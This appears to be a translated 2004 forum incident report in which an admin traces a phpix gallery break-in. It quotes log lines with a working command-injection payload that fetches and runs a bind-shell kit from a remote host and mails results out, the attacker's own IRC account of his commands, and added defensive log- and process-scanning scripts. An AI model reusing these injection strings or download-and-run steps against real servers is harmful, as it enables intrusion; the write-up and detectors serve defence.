12.02.2004
During a routine 'ps aux' on my root server I noticed something odd: the user www6, who actually has no SSH access and no knowledge of it, had gcc compiling and two further processes running: zbind and ./tmp.
Since this struck me as very strange, I immediately did a 'kill -9 pid' and killed all the processes. Then I searched Google for zbind, but the search was fairly fruitless.
A cat /var/www/www6/log/access_log | grep wget then turned up the following:
Code:
213.233.93.85.dial.xnet.ro - - [10/Feb/2004:21:48:11 +0100] "GET /gallery/index.php?mode=view&album=Kreiskongress+21.02.2003&pic=DSCF0012.JPG&dispsize=`cd%20/var/tmp;%20wget%20plasture.go.ro/za.tgz;%20tar%20xzvf%20za.tgz;%20cd%20za;./zbind;ls%20-a%20|%20mail%20merlin_uta@yahoo.com`&start=0 HTTP/1.1" 200 1112 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
80.97.208.113 - - [10/Feb/2004:21:49:54 +0100] "GET /gallery/index.php?mode=view&album=Kreiskongress+21.02.2003&pic=DSCF0012.JPG&dispsize=`cd%20/var/tmp;%20wget%20plasture.go.ro/za.tgz;%20tar%20xzvf%20za.tgz;%20cd%20za;./zbind;ls%20-a%20|%20mail%20merlin_uta@yahoo.com`&start=0 HTTP/1.1" 200 1073 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
80.97.208.113 - - [10/Feb/2004:21:49:55 +0100] "GET /gallery/generated/Kreiskongress%2021.02.2003/DSCF0012__scaled_`cd%20/var/tmp;%20wget%20plasture.go.ro/za.tgz;%20tar%20xzvf%20za.tgz;%20cd%20za;./zbind;ls%20-a%20|%20mail%20merlin_uta@yahoo.com`.jpg HTTP/1.1" 404 497 "http://www.server.de/gallery/index.php?mode=view&album=Kreiskongress+21.02.2003&pic=DSCF0012.JPG&dispsize=`cd%20/var/tmp;%20wget%20plasture.go.ro/za.tgz;%20tar%20xzvf%20za.tgz;%20cd%20za;./zbind;ls%20-a%20|%20mail%20merlin_uta@yahoo.com`&start=0" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
80.97.208.113 - - [10/Feb/2004:21:50:13 +0100] "GET /gallery/generated/Kreiskongress%2021.02.2003/DSCF0012__scaled_`cd%20/var/tmp;%20wget%20plasture.go.ro/za.tgz;%20tar%20xzvf%20za.tgz;%20cd%20za;./zbind;ls%20-a%20|%20mail%20merlin_uta@yahoo.com`.jpg HTTP/1.1" 404 497 "http://www.server.de/gallery/index.php?mode=view&album=Kreiskongress+21.02.2003&pic=DSCF0012.JPG&dispsize=`cd%20/var/tmp;%20wget%20plasture.go.ro/za.tgz;%20tar%20xzvf%20za.tgz;%20cd%20za;./zbind;ls%20-a%20|%20mail%20merlin_uta@yahoo.com`&start=0" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
http://www.tecchannel.de/sicherheit/reports/2015.html
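A grep for 'wget' finds this one payload and nothing else. The following is an added example (my own code, not from the post, from phpix or from any tool) that parses access_log lines and flags requests whose decoded query values or path contain shell metacharacters or download-and-run tokens. Note that the injected command shows up both in the dispsize parameter and, for the 404 entries, in the generated image path, so both are scanned. The sample lines are constructed with placeholder hosts (192.0.2.x, attacker.invalid), patterned on the entries above.

```python
"""Flag shell-injection attempts in Apache access_log lines (added example, not from the post)."""
import re
from urllib.parse import unquote, unquote_plus, urlsplit

# Combined/common log prefix: host ident user [time] "request" status size ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Shell metacharacters that never belong in a gallery URL once decoded.
SHELL_META_RE = re.compile(r'`|\$\(|\$\{|;|\||\n')
# Tokens typical of download-and-execute payloads.
SUSPECT_TOKENS = ('wget ', 'curl ', '/var/tmp', '/tmp/', 'chmod ')

# Constructed sample lines (placeholder hosts, not the forum's own log);
# lines 1 and 4 mirror the shape of the injection entries quoted above.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Feb/2004:21:48:11 +0100] "GET /gallery/index.php?mode=view&album=Test&pic=DSCF0012.JPG&dispsize=`cd%20/var/tmp;%20wget%20attacker.invalid/za.tgz;%20tar%20xzvf%20za.tgz;./zbind`&start=0 HTTP/1.1" 200 1112 "-" "Mozilla/4.0"
192.0.2.11 - - [10/Feb/2004:21:49:54 +0100] "GET /gallery/index.php?mode=view&album=Test&pic=DSCF0012.JPG&dispsize=640&start=0 HTTP/1.1" 200 1073 "-" "Mozilla/4.0"
192.0.2.12 - - [10/Feb/2004:21:50:02 +0100] "GET /gallery/index.php?mode=view&album=Test&pic=DSCF0012.JPG&dispsize=640;id&start=0 HTTP/1.1" 200 800 "-" "Mozilla/4.0"
192.0.2.10 - - [10/Feb/2004:21:50:13 +0100] "GET /gallery/generated/Test/DSCF0012__scaled_`cd%20/var/tmp;%20wget%20attacker.invalid/za.tgz`.jpg HTTP/1.1" 404 497 "-" "Mozilla/4.0"
"""


def parse_line(line):
    """Split one log line into fields; return None if it is not a request line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    words = m.group('request').split(' ')
    # Method is the first word and protocol the last; everything between is the
    # target, so a literal space smuggled into the URL does not break the parse.
    target = ' '.join(words[1:-1]) if len(words) >= 3 else ''
    return {'host': m.group('host'), 'time': m.group('time'),
            'method': words[0], 'target': target, 'status': int(m.group('status'))}


def query_params(query):
    """Decode name=value pairs by hand so ';' inside a value is never treated as a separator."""
    for pair in query.split('&'):
        name, _, value = pair.partition('=')
        yield unquote_plus(name), unquote_plus(value)


def looks_injected(text):
    """True if decoded text carries shell metacharacters or download-and-run tokens."""
    return bool(SHELL_META_RE.search(text)) or any(t in text.lower() for t in SUSPECT_TOKENS)


def injection_indicators(target):
    """Return (location, decoded_text) pairs in a request target that look like shell injection."""
    hits = []
    parts = urlsplit(target)
    for name, value in query_params(parts.query):
        if looks_injected(value):
            hits.append(('query:' + name, value))
    path = unquote(parts.path)
    if looks_injected(path):
        hits.append(('path', path))
    return hits


def scan_log(text):
    """Return one finding per suspicious request line in an access log."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is not None:
            hits = injection_indicators(rec['target'])
            if hits:
                findings.append({'host': rec['host'], 'time': rec['time'],
                                 'status': rec['status'], 'hits': hits})
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f['time'], f['host'], f['status'], f['hits'])
```

Run it against a real log with `scan_log(open('/var/www/www6/log/access_log').read())`; the 404 hits matter as much as the 200s, because the image path carries the same command and a failed image fetch is the only trace if the index.php request was logged elsewhere.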
Okay, I did a wget plasture.go.ro/za.tgz and looked inside the file: zbind and zero! In /var/tmp there were also a psybnc directory and a directory without a name.
I also found a file named kaka.tgz, with the following nice contents:
Code:
-rwxr-xr-x 1 autoresp 500 130 Dec 23 14:11 .drdos
-rwxr-xr-x 1 autoresp 500 93694 Feb 10 00:08 a
-rw-rw-r-- 1 autoresp 500 3556 Feb 10 00:16 all.log
-rwxr-xr-x 1 autoresp 500 132720 Feb 10 00:08 apach-scan.1
-rw-r--r-- 1 autoresp 500 469 Dec 20 14:28 as8758.net
-rwxr-xr-x 1 autoresp 500 441463 Feb 10 00:08 brk
-rw-r--r-- 1 autoresp 500 42 Jan 13 03:33 bucate
-rw------- 1 autoresp 500 106496 Jan 13 03:32 core
-rwxr-xr-x 1 autoresp 500 26692 Feb 10 00:08 dmntreal
-rwxr-xr-x 1 autoresp 500 264608 Feb 10 00:08 ipv6fuck
-rw-r--r-- 1 autoresp 500 15905 Jul 7 2003 ipv6fuck.c
-rw-r--r-- 1 autoresp 500 45 Jan 22 04:49 kaka.tgz
-rwxr-xr-x 1 autoresp 500 453572 Feb 10 00:08 megaDoS
drwxr-xr-x 2 autoresp 500 4096 Jan 13 04:53 synscan
-rw-r--r-- 1 autoresp 500 47127 Dec 19 23:12 wget-log
-rwxr-xr-x 1 autoresp 500 132720 Jan 22 00:12 x
In psybnc.conf I then found the following entries:
Code:
PSYBNC.SYSTEM.PORT1=31337
PSYBNC.SYSTEM.HOST1=*
PSYBNC.HOSTALLOWS.ENTRY0=*;*
USER1.USER.LOGIN=perseu
USER1.USER.USER=dominic
USER1.USER.PASS==16`e`a`K'm'C'O`Q09
USER1.USER.RIGHTS=1
USER1.USER.VLINK=0
USER1.USER.PPORT=0
USER1.USER.PARENT=0
USER1.USER.QUITTED=0
USER1.USER.ACOLLIDE=0
USER1.USER.DCCENABLED=1
USER1.USER.AIDLE=0
USER1.USER.LEAVEQUIT=0
USER1.USER.AUTOREJOIN=1
USER1.USER.SYSMSG=1
USER1.USER.LASTLOG=0
USER1.USER.AWAYNICK=sculam3nt
USER1.USER.AWAY=sunt un sculoi
USER1.USER.NICK=sculam3nt
USER1.SERVERS.SERVER1=eu.undernet.org
USER1.SERVERS.PORT1=6667
USER1.CHANNELS.ENTRY0=#pandispan
The rest can now be read here:
Code:
Session Start: Thu Feb 12 20:03:38 2004
Session Ident: #pandispan
[20:03:38] * Now talking in #pandispan
[20:03:38] * Topic is 'jjj'
[20:03:38] * Set by pandispan on Thu Feb 12 17:57:29
[20:03:52] * Disconnected
[20:04:08] * Attempting to rejoin channel #pandispan
[20:04:08] * Rejoined channel #pandispan
[20:04:08] * Topic is 'jjj'
[20:04:08] * Set by pandispan on Thu Feb 12 17:57:29
[20:04:11] * hot_babe (hot_babe@213.233.68.149) Quit (Read error: Connection reset by peer)
[20:04:14] <ich> this is nice
[20:04:17] <ich> here are the hackers
[20:04:35] <ich> just found a psybnc which was compiling itself on my server
[20:04:38] <ich> very well done
[20:04:43] * AmigoXp (~AmigoXp@AmigoXp.users.undernet.org) Quit (Read error: Connection reset by peer)
[20:05:36] <ich> cd%20/var/tmp;%20wget%20plasture.go.ro/za.tgz
[20:05:40] <ich> u know that
[20:07:33] <@pandispan> tu cine esti
[20:07:50] <ich> USER1.USER.LOGIN=perseu
[20:07:55] <ich> USER1.USER.USER=dominic
[20:08:25] * pandispan sets mode: +b *!*@p508C10B7.dip0.t-ipconnect.de
[20:08:31] * You were kicked by pandispan (who are you?)
[20:08:31] * Attempting to rejoin channel #pandispan
[20:08:31] * Unable to join channel (address is banned)
[20:08:57] #pandispan Cannot send to channel
[20:08:58] #pandispan Cannot send to channel
[21:02:54] * Attempting to rejoin channel #pandispan
[21:02:54] * Unable to join channel (address is banned)
Session Close: Thu Feb 12 21:04:56 2004
Code:
Session Start: Thu Feb 12 20:08:11 2004
Session Ident: pandispan
[20:08:11] * Logging pandispan to 'logsUnderNetpandispan.20040201.log'
[20:08:15] <ich> who i am?
[20:08:22] <ich> a guy u tried to hack i guess
[20:08:28] <ich> USER1.USER.PASS==16`e`a`K'm'C'O`Q09
[20:08:36] <ich> USER1.USER.AWAYNICK=sculam3nt
[20:08:41] <ich> USER1.USER.AWAY=sunt un sculoi
[20:08:45] <ich> USER1.USER.NICK=sculam3nt
[20:09:00] <ich> USER1.USER.NICK=sculam3nt
[20:09:04] <pandispan> ?
[20:09:08] <ich> cd%20/var/tmp;%20wget%20plasture.go.ro/za.tgz;%20tar%20xzvf%20za.tgz;%20cd%20za;./zbind;ls%20-a%20|%20mail%20merlin_uta@yahoo.com
[20:09:13] <ich> found that in my logs
[20:09:26] <ich> wgot that file and looked at it
[20:09:30] <ich> and killed zbind
[20:09:35] <ich> and killed tmp
[20:09:42] <ich> and deleted ./var/tmp//
[20:09:43] <pandispan> hahahahahahah
[20:09:50] <ich> is there something else?
[20:10:00] <pandispan> your an admin
[20:10:04] <ich> why are you doing this?
[20:10:10] <pandispan> smth with server.de wright?
[20:10:15] <ich> thats right
[20:10:16] <ich> wow
[20:10:23] <ich> safe mode on now
[20:10:28] <pandispan> good 4 you
[20:10:30] <ich> can u help me secure my server?
[20:10:36] <ich> i am very impressed
[20:11:02] <pandispan> yet again,good 4 you
[20:11:05] <ich> i was looking at ps aux
[20:11:15] <pandispan> you`re happy you achieved such a thing right?
[20:11:20] <ich> and saw sth compiling
[20:11:23] <ich> not very happy
[20:11:33] <ich> because i thought the server was secure
[20:11:41] <pandispan> well,for fun i guess,i won't fuck up your server dude
[20:11:50] <pandispan> well oke
[20:11:52] <pandispan> i'll help
[20:12:02] <pandispan> on one condition
[20:12:05] <pandispan> i'll help you
[20:12:05] <ich> okay
[20:12:07] <pandispan> ?
[20:12:12] <ich> condition?
[20:12:34] <ich> i thought i am good at linux :)
[20:12:53] <pandispan> listen,i'll help you secure your server on one condition
[20:12:58] <ich> ok i liste
[20:13:15] <pandispan> that you just keep a bnc
[20:13:18] <pandispan> for me
[20:13:26] <pandispan> always
[20:13:27] <ich> why should i do that?
[20:13:35] <pandispan> yea man,a psybnc like that tmp i putted
[20:13:45] <ich> why should i trust you?
[20:13:49] <pandispan> lol
[20:13:54] <pandispan> do you agree?
[20:14:03] <ich> i asked a question
[20:14:06] <pandispan> all i want is a really stable bnc
[20:14:20] <ich> for doing more of that stuff?
[20:14:28] <ich> u know there are laws
[20:14:38] <ich> and if something happens I am responsible
[20:14:39] <pandispan> if you want me to help you secure your server
[20:14:51] <ich> you think i am a newbie
[20:15:07] <pandispan> no
[20:15:12] <pandispan> believe me
[20:15:14] <pandispan> i am romanian
[20:15:18] <ich> i know
[20:15:28] <pandispan> dude,compared to a romanian you are
[20:16:00] <pandispan> so were were we
[20:16:02] <ich> i am??
[20:16:10] <pandispan> there are la thousands of bouncers
[20:16:18] <ich> yers
[20:16:19] <ich> yes
[20:16:22] <pandispan> it's not at all dangerous
[20:16:33] <ich> this is crazy
[20:16:43] <ich> u want me to keep a bouncer for you
[20:16:47] <pandispan> just your word to keep that bnc for me as long as the server is onlain
[20:16:49] <ich> after u tried to hack my server
[20:16:52] <pandispan> if you want my help
[20:17:08] <pandispan> i can like put down your server if am a nasty man
[20:17:17] <pandispan> but i won;t
[20:17:26] <pandispan> i have about a hundred sites
[20:17:27] <pandispan> or more
[20:17:34] <ich> oh u mean ddos
[20:17:36] <pandispan> wich i got a few days ago
[20:17:46] <ich> is that a sport for you?
[20:17:47] <pandispan> i don't like to do damage
[20:18:03] <pandispan> entering servers is kind of a hobby
[20:18:18] <pandispan> i dont do damage,i repeat,i dont do damage
[20:18:49] <ich> this is good :)
[20:18:56] <pandispan> so,will you keep a bnc for me or not?
[20:19:01] <pandispan> koz it's not at all dangerous
[20:19:09] <ich> after we secured 'our' server
[20:19:18] <ich> i want to see what you will do
[20:19:24] <ich> what do u suggest?
[20:19:35] <pandispan> ha?
[20:19:52] <ich> what do u sugesst for securing
[20:20:01] <ich> u give i take i give u take
[20:20:04] <ich> its that easy
[20:20:15] <pandispan> i can suggest a few things
[20:20:23] <pandispan> only if you promise to keep it for me
[20:20:48] <ich> lets see what you sugesst
[20:20:53] <pandispan> hahaha
[20:21:05] <pandispan> do you promise or do you not?
[20:22:33] <ich> go on
[20:22:51] <pandispan> omg
[20:22:53] <pandispan> just tell me
[20:23:03] <pandispan> if you agree to keep a bnc for me
[20:23:04] <pandispan> or not
[20:23:51] <ich> ok
[20:24:13] <pandispan> really really?
[20:24:18] <ich> ok
[20:24:25] <pandispan> wtf,i eint got nothin to lose
[20:24:34] <ich> right
[20:24:36] <ich> me too :)
[20:24:39] <ich> ok go on
[20:24:43] <pandispan> what is your kernel version by the way ?
[20:25:26] <ich> 2.4.23
[20:25:29] <pandispan> anyway,for the moment it can't be rooted
[20:25:32] <ich> without do_brk
[20:25:49] <ich> and grsecurity patcehs
[20:25:50] <pandispan> just upgrade it to be safe
[20:26:01] <ich> whats in the 2.4.24?
[20:26:02] <pandispan> remove the wget command
[20:26:14] <pandispan> and remove phpix from your server
[20:26:18] <ich> yes i do
[20:26:22] <ich> and safe mode?
[20:26:28] <pandispan> it's as vulnerable as 2.4.23
[20:26:28] <ich> but i have suphp
[20:26:44] <ich> and i saw that the server user was compiling sth
[20:26:46] <pandispan> i don;t think that is vulnerable
[20:27:00] <ich> what could you have done with zbind?
[20:27:07] <pandispan> yea,i was compiling the bouncer
[20:27:17] <pandispan> well,zbind opens up the server
[20:27:22] <pandispan> a tty on port 4000
[20:27:27] <pandispan> i enter
[20:27:36] <pandispan> and i root it if the kernel version is vulnerable
[20:27:50] <pandispan> if not,i place a bnc for fun
[20:27:54] <pandispan> and leave it alone
[20:28:06] <ich> crazy
[20:28:15] <ich> how many machines do you have?
[20:28:30] <pandispan> many
[20:28:37] <pandispan> a great deal
[20:28:47] <pandispan> well not that many,:)
[20:28:48] <pandispan> about 100
[20:28:51] <pandispan> or more
[20:29:06] <ich> be honest: why do you do that?
[20:29:14] <pandispan> but next month i'll get a new remote exploit probably and get much more
[20:29:26] <pandispan> dude ,for fune
[20:29:35] <pandispan> it's not like i do any damage
[20:29:52] <pandispan> mostly after i become root,no one notices me
[20:30:02] <pandispan> a few months ago
[20:30:07] <ich> i see
[20:30:09] <pandispan> i owned a credit card portal
[20:30:33] <pandispan> thousands of credit cards went through there daily
[20:30:45] <pandispan> i kept it a few weeks,nobody could notice me
[20:30:48] <ich> is that that famous hacking mentality? not to do any damage?
[20:30:51] <pandispan> then i forgot the pass
[20:30:52] <ich> this is really hard
[20:30:55] <pandispan> smth like that;0
[20:31:35] <ich> sounds interesting
[20:31:36] <pandispan> not really
[20:31:39] <ich> whats your age?
[20:31:51] <pandispan> it's very hard to understand a haacker if you're not one
[20:31:56] <pandispan> specially a romanian oen
[20:31:58] <pandispan> one
[20:32:03] <pandispan> we are really special people
[20:32:23] <ich> i read many things about hackers
[20:32:32] <ich> u know the german film '23'?
[20:32:33] <pandispan> but mostly we hack for 2 or 3 reasons
[20:32:39] <ich> they are?
[20:32:40] <pandispan> 15
[20:32:50] <pandispan> 1. we hack to put bouncers or bots
[20:32:52] <pandispan> 2. for cc's
[20:33:04] <ich> ccs? dont know that
[20:33:12] <pandispan> 3.to sniff,that's another joy but not really a reason
[20:33:22] <ich> sniffing is looking in network packets?
[20:33:48] <ich> what are ccs?
[20:33:49] <pandispan> nope
[20:34:28] <pandispan> credit card
[20:34:28] <pandispan> s
[20:34:30] <ich> ah ok
[20:34:41] <pandispan> anyway,there's nothing compared to romanians
[20:34:46] <pandispan> smth like that
[20:34:59] <ich> whats so special about romanians?
[20:35:00] <ich> tell me
[20:35:06] <ich> i am always interested
[20:35:12] <pandispan> i place smth wich logs all who enter the server
[20:35:17] <pandispan> and there passwds
[20:35:25] <ich> ah ok thats sniffing
[20:35:33] <pandispan> so i can enter every linux box that enters the server
[20:35:51] <ich> uhm?
[20:35:53] <ich> what?
[20:36:18] <pandispan> ?/
[20:36:40] <pandispan> anyway i sugest you visit romania
[20:36:46] <ich> if i got time
[20:36:50] <pandispan> the land of everything
[20:36:54] <ich> at the moment i am doing studies
[20:37:00] <pandispan> kind of a jungle
[20:37:08] <pandispan> but the coolest place in the univers
[20:37:43] <pandispan> it would take years
[20:37:48] <pandispan> it's like a jungle coz the strongest survives
[20:38:05] <ich> is there something else to secure the server? fuck php, its very nice but insecure... but safemode should do it right?
[20:38:06] <pandispan> you can't get rich if you don't steal or comit fraud
[20:38:10] <ich> wow
[20:38:14] <ich> are u sure?
[20:38:25] <pandispan> it's verry difficult to explain
[20:38:27] <ich> 15 years old and this kind of thoughts???
[20:38:45] <pandispan> the aura of "manele"
[20:38:53] <pandispan> is a very special thing
[20:38:55] <ich> whats that?
[20:39:00] <pandispan> human language cannot describe it
[20:39:26] <ich> okay i see
[20:39:34] <ich> whats that kaka.tgz inside your file?
[20:40:26] <pandispan> no good
[20:40:31] <ich> i know
[20:40:31] <pandispan> you have to see it to believe it:)
[20:40:37] <pandispan> anyway how about that bnc
[20:40:38] <ich> be honest
[20:40:47] <ich> tell me everything what you did
[20:41:02] <ich> then we can talk about bnc
[20:41:38] <pandispan> dude,you don't really need safemode
[20:41:49] <pandispan> thank you very much:)
[20:42:06] <ich> what?
[20:42:30] <pandispan> what's what
[20:42:31] <pandispan> ?
[20:42:38] <ich> [20:41:38] <pandispan> dude,you don't really need safemode
[20:42:43] <ich> what dya mean?
[20:42:56] <ich> i just wanted to know what u did
[20:43:20] <pandispan> anyway the only way to enter your server is through phpix
[20:43:29] <pandispan> a openssl scanner
[20:43:35] <pandispan> a friend gave it to me
[20:43:36] <ich> zbind
[20:43:41] <pandispan> he asked me to scan for him
[20:43:59] <pandispan> anyway the only way to enter your server is through phpix and i developed this method a few weeks ago
[20:44:10] <pandispan> and told it to about 3-4 friends
[20:44:16] <ich> dont understand... with the openssl scanner u found my server
[20:45:00] <ich> register_globals off should also be good i think?
[20:45:07] <ich> dude, you woke me up
[20:45:16] <ich> i believed that thing was secure
[20:45:37] <pandispan> you want the exact commands i typed ?
[20:45:44] <ich> yes plz
[20:46:04] <pandispan> so,i planted the zbind
[20:46:06] <pandispan> i enterd
[20:46:09] <pandispan> uname -a
[20:46:11] <pandispan> cd /var/tmp
[20:46:12] <pandispan> ls -a
[20:46:14] <pandispan> rm -rf z*
[20:46:28] <pandispan> wget iwonttellyouwantsite.com/loginx.tar.gz
[20:46:33] <pandispan> tar xzvf loginx.tar.gz
[20:46:36] <pandispan> ./loginx
[20:46:42] <pandispan> it did not work
[20:46:49] <pandispan> coz your kernel iz new
[20:46:51] <pandispan> so
[20:46:57] <pandispan> rm -rf log*
[20:47:01] <pandispan> mkdir ' '
[20:47:02] <pandispan> cd ' '
[20:47:05] <ich> oh a you wanted to root it
[20:47:08] <ich> that dir i found
[20:47:09] <pandispan> wget blablabla.com/psybnc.tgz
[20:47:14] <pandispan> tar xzvf psybnc.tgz
[20:47:20] <pandispan> mv psybnc tm
[20:47:22] <pandispan> tmp
[20:47:24] <pandispan> cd tmp
[20:47:24] <pandispan> make
[20:47:27] <pandispan> mv psybnc tmp
[20:47:29] <pandispan> ./tmp
[20:47:31] <ich> there i saw u
[20:47:34] <ich> 'make'
[20:47:41] <pandispan> these are the exact commands i typed
[20:47:47] <pandispan> and then i putet kaka.tgz
[20:47:51] <pandispan> which is a scanner
[20:47:53] <ich> and tmp was the bnc
[20:47:56] <pandispan> that doesnt work
[20:48:05] <pandispan> coz you dont have the necessary libraries
[20:48:10] <pandispan> i planted the bnc
[20:48:17] <pandispan> and 2minutes later you killed it
[20:48:51] <pandispan> you told me safemode would do the trick
[20:48:57] <ich> i am amazed
[20:49:04] <pandispan> honestly i dont really know what the fuck is safe mode
[20:49:10] <ich> oh
[20:49:13] <ich> i explain
[20:49:16] <pandispan> listen,as long as i can't become root
[20:49:26] <pandispan> i cant do anything to your server
[20:49:28] <ich> u got into with php which runs under suphp
[20:49:41] <ich> and php knows safe mode and register globals
[20:49:51] <ich> and it means to be "secure"
[20:50:01] <ich> if there is any security in the world *g*
[20:50:06] <pandispan> what's with the zbind?
[20:50:13] <pandispan> wanna see it's source
[20:50:14] <pandispan> ?
[20:50:17] <ich> i read that u dont need safemode if using suphp
[20:50:20] <ich> yes plz
[20:51:26] <pandispan> nooo
[20:51:30] <pandispan> with google
[20:51:31] <ich> what?
[20:51:32] <pandispan> i typed phpix
[20:51:40] <pandispan> i enter through phpix
[20:51:48] <pandispan> openssl exploits are like 3 years old
[20:52:05] <pandispan> lol
[20:52:07] <pandispan> chill
[20:52:13] <pandispan> nobody can enter your server
[20:52:17] <pandispan> if you take of phpix
[20:52:23] <ich> yes 013004 there was a news here
[20:52:24] <ich> http://www.tecchannel.de/sicherheit/reports/2015.html
[20:52:27] <ich> just read it
[20:52:31] <ich> sry its german
[20:52:57] <ich> its crazy we both are chatting eh?
[20:53:48] <pandispan> i can recommend a good song 4 you
[20:53:52] <pandispan> manele style
[20:54:02] <ich> ok ... type that in kazaa
[20:54:02] <pandispan> take it of kazaa if you have time
[20:54:05] <ich> lol
[20:54:12] <pandispan> to understand some of the mentality of romanians
[20:54:16] <pandispan> 4 nopti si 4 zile
[20:54:19] <pandispan> liviu guta
[20:54:26] <pandispan> 4 nopti si 4 zile - is the name of the song
[20:54:32] <ich> ok i search
[20:55:08] <ich> what about the bnc?
[20:55:15] <ich> does this have to be?
[20:55:26] <ich> u have hundreds of bncs
[20:55:42] <ich> i just rented that server to host some friends on it
[20:55:53] <pandispan> ?
[20:56:06] <ich> yeah i feel insecure to give u a bnc on it
[20:56:14] <ich> to someone i dont know
[20:56:22] <ich> u know what i mean?
[20:56:28] <pandispan> no
[20:56:33] <pandispan> i was compiling the bnc
[20:56:52] <pandispan> i tried to root yor server a few days ago
[20:57:01] <ich> i saw
[20:57:09] <pandispan> yes
[20:57:12] <ich> 213.233.93.85.dial.xnet.ro - - [10/Feb/2004:21:48:11 +0100]
[20:57:13] <ich> and?
[20:57:32] <ich> why didnt u?
[20:58:16] <pandispan> ?/?
[20:58:25] <ich> today we have feb 12
[20:58:30] <ich> that was at feb 10
[20:58:36] <ich> %
[20:58:36] <ich> 213.233.93.85.dial.xnet.ro - - [10/Feb/2004:21:48:11 +0100] "GET /gallery/index.php?mode=view&album=Kreiskongress+21.02.2003&pic=DSCF0012.J
[20:58:36] <ich> PG&dispsize=`cd%20/var/tmp;%20wget%20plasture.go.ro/za.tgz;%20tar%20xzvf%20za.tgz;%20cd%20za;./zbind;ls%20-a%20|%20mail%20merlin_uta@yahoo.
[20:58:36] <ich> com`&start=0 HTTP/1.1" 200 1112 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
[20:58:47] <ich> where are the today logs?
[20:58:54] <ich> sure u didntdo anything else?
[20:59:47] <ich> or do u have that tty since the day before yesterday?
[21:00:00] <pandispan> well in phpix
[21:00:08] <ich> yes?
[21:00:12] <pandispan> when you visit the site
[21:00:16] <pandispan> and wanna see a pic
[21:00:51] <pandispan> at the end,the link is smth like pic.jpg&dispsize=number&start=0
[21:01:00] <ich> i know how u gut in
[21:01:09] <ich> u attaced shell commands
[21:01:10] No such nick
[21:01:15] <ich> but
[21:01:15] No such nick
[21:01:31] <ich> :)
[21:01:31] No such nick
Session Close: Thu Feb 12 21:04:56 2004
And then he was gone....
The server is clean again, Safe_Mode set to On and register_globals to Off! Contrary to the statement in http://www.rootforum.org/forum/viewtopi ... p+safemode
I have now re-enabled safe mode. Incidentally, I just tried out that exact vulnerability myself and it really works. So throw phpix out or rewrite it!
In summary:
- Via a hole in phpix, a binary is installed which opens a shell on port 4000 and sends the kiddie an e-mail -> he has the IP address and can connect
- Kiddie pulls down more stuff, tries to root the server
- Doesn't work, since it's a new kernel without the do_brk() exploit
- Kiddie installs psybnc for fun
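The chain above was only noticed because a web-server account turned up in ps aux running gcc. As an added example (my own code, not the post's or any tool's), here is a check that parses ps aux output and flags processes under web accounts that run build or download tools, start executables by relative path (./zbind, ./tmp) or reference /var/tmp; the account-name prefixes, the tool list and the sample ps output are constructed assumptions and should be adjusted to the local user scheme.

```python
"""Flag processes a web-server account should never be running (added example, not from the post)."""
import os
import subprocess

# Accounts under which CGI/PHP code runs on a typical shared host (assumption;
# www6 is the account named in the post). Adjust to the local user scheme.
WEB_USER_PREFIXES = ('www', 'apache', 'nobody', 'wwwrun')
# Build tools and downloaders that web code has no reason to start.
TOOLCHAIN = {'gcc', 'cc', 'g++', 'make', 'as', 'ld', 'wget', 'curl', 'tar'}
# World-writable scratch locations where dropped files end up.
SCRATCH_DIRS = ('/var/tmp', '/tmp', '/dev/shm')

# Constructed `ps aux` output (not from the post) mirroring what the author saw.
SAMPLE_PS = """\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1   1376   432 ?        S    Feb10   0:04 init
root       412  0.0  0.4   4520  2100 ?        S    Feb10   0:00 /usr/sbin/sshd
www6      2201  0.0  0.5   8120  2800 ?        S    Feb11   0:12 /usr/bin/php /var/www/www6/html/index.php
www6      4711  9.8  1.2  12340  6120 ?        R    20:01   0:03 gcc -O2 -c psybnc.c
www6      4712  0.0  0.2   1520   840 ?        S    20:00   0:00 ./zbind
www6      4713  0.0  0.3   2940  1560 ?        S    20:01   0:00 ./tmp
www6      4720  0.0  0.2   1600   900 ?        S    20:02   0:00 wget http://example.invalid/za.tgz
"""


def is_web_user(user):
    return user.startswith(WEB_USER_PREFIXES)


def classify(user, command):
    """Return a reason string if this process is suspicious for a web account, else None."""
    if not is_web_user(user):
        return None
    argv = command.split()
    if not argv:
        return None
    base = os.path.basename(argv[0])
    if base in TOOLCHAIN:
        return 'build/download tool: ' + base
    if argv[0].startswith(('./', '../')):
        return 'executable started by relative path: ' + argv[0]
    if any(arg.startswith(SCRATCH_DIRS) for arg in argv):
        return 'references scratch directory: ' + command
    return None


def parse_ps(text):
    """Parse `ps aux` output into (user, pid, command) tuples; COMMAND may contain spaces."""
    rows = []
    for line in text.splitlines()[1:]:   # skip the header row
        cols = line.split(None, 10)       # 11 columns, the last is the full command line
        if len(cols) < 11:
            continue
        rows.append((cols[0], int(cols[1]), cols[10]))
    return rows


def suspicious_processes(ps_text):
    """Return [(pid, user, reason, command)] for processes that warrant a look."""
    out = []
    for user, pid, command in parse_ps(ps_text):
        reason = classify(user, command)
        if reason:
            out.append((pid, user, reason, command))
    return out


if __name__ == '__main__':
    try:
        ps_text = subprocess.run(['ps', 'aux'], capture_output=True,
                                 text=True, check=True).stdout
    except (OSError, subprocess.CalledProcessError):
        ps_text = SAMPLE_PS   # fall back to the constructed sample off-box
    for pid, user, reason, command in suspicious_processes(ps_text):
        print(f'{pid:>6} {user:<10} {reason}  [{command}]')
```

On the sample it flags exactly the four processes from the post's chain (the compile, zbind, the renamed psybnc and the download) and leaves the legitimate PHP CGI alone; run from cron it turns the author's lucky glance at ps aux into a routine check.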
From several of his statements I assume it was a script kiddie who just wanted to try something out.
What I have learned:
- Always stay up to date (kernel update!); luckily I installed 2.4.23 back when the do_brk() issue became known, otherwise he would have rooted me (it's in the log above somewhere)!
